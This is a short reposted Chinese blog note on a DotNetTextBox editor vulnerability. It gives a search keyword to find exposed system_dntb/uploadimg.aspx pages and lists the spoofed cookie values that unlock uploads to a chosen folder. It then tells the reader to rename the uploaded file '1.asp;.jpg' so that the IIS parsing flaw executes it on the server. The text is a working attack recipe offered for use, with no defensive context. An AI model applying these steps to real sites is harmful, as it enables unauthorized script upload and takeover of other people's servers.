关键字:system_dntb/
确定有 system_dntb/uploadimg.aspx
并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。
cookie:UserType=0;
IsEdition=0; Info=1;
uploadFolder=../system_dntb/Upload/;
路径可以修改,只是权限够,上传后改名为1.asp;.jpg利用iis解析漏洞。
(转载)DotNetTextBox编辑器漏洞(system_dntb漏洞),布布扣,bubuko.com
时间: 2024-11-03 09:13:35